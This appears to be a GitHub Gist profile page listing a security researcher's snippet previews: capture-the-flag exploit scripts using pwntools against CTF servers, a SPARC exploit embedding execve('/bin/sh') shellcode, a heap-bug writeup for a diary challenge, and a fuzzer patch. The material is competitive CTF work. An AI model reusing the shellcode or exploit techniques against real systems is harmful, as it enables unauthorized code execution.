Skip to content

Instantly share code, notes, and snippets.

View farazsth98's full-sized avatar
๐Ÿ”
Looking for zero days

Faith farazsth98

๐Ÿ”
Looking for zero days
157 followers · 12 following
View GitHub Profile
@farazsth98
farazsth98 / bitmapmanager.py
Last active November 22, 2020 21:31
# Writeup at https://faraz.faith/2020-11-23-dragonctf-bitmapmanager/
# Credits to https://twitter.com/RBTree_
import struct
from pwn import *
def make_image(length, check):
t = b"BM" # signature
t += struct.pack("<I", length) # file size
t += b'\x00' * 4 # reserved, has to be 0
@farazsth98
farazsth98 / balsnctf_diary.md
Last active November 17, 2020 00:04

Functionality

At the beginning, the binary lets you enter 0x20 bytes for your name. This is stored in the bss section, and it is not null terminated. After this, you get the following menu options:

  1. Show Name - Shows you your name
  2. Write Diary - Lets you allocate a page of max 0x80 size. The first four bytes of this page chunk stores the size you choose, and then the rest is the content you enter. calloc is used to allocate this chunk. This chunk's pointer is stored in an array immediately after your name in the bss section (meaning the name can be aligned to it and you can leak it using option 1). You can have a max of 14 pages.
  3. Read Diary - Lets you pick a page index, and the corresponding page contents is output to you (using puts).
  4. Edit Diary - Lets you pick a page index to edit. It will use the size stored in the first 4 bytes of the page chunk to determine how many bytes you can edit. The page index you enter is signed, so there is a bug here (you can enter negative
@farazsth98
farazsth98 / shadowstuck.py
Created November 8, 2020 18:09
#!/usr/bin/env python3
from pwn import *
elf = ELF("./shadowstuck")
libc = ELF("./libc-2.31.so")
#p = process("./shadowstuck", env={"LD_PRELOAD": "./libc-2.31.so"})
p = remote("challenges.ctf.kaf.sh", 8000)
'''
@farazsth98
farazsth98 / secret_pwnhub_academy_rewards_club_2.py
Created October 26, 2020 10:04
Secret Pwnhub Academy Awards Club 2 exploit script from Hack.lu CTF 2020 (ugly)
#!/usr/bin/env python3
from pwn import *
context.arch = "sparc"
elf = ELF("./sparc-2")
p = remote("flu.xxx", 2025)
shellcode = b"AA\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10\xc0\x23\xbf\xec\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a\x82\x10\x20\x3b\x91\xd0\x20\x08\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
@farazsth98
farazsth98 / honggfuzz-patch.diff
Created March 22, 2020 01:52
diff --git a/sanitizers.c b/sanitizers.c
index 78d8fafc..1c905d97 100644
--- a/sanitizers.c
+++ b/sanitizers.c
@@ -23,7 +23,6 @@
"symbolize=1:" \
"detect_leaks=0:" \
"disable_coredump=0:" \
- "detect_odr_violation=0:" \
"allocator_may_return_null=1:" \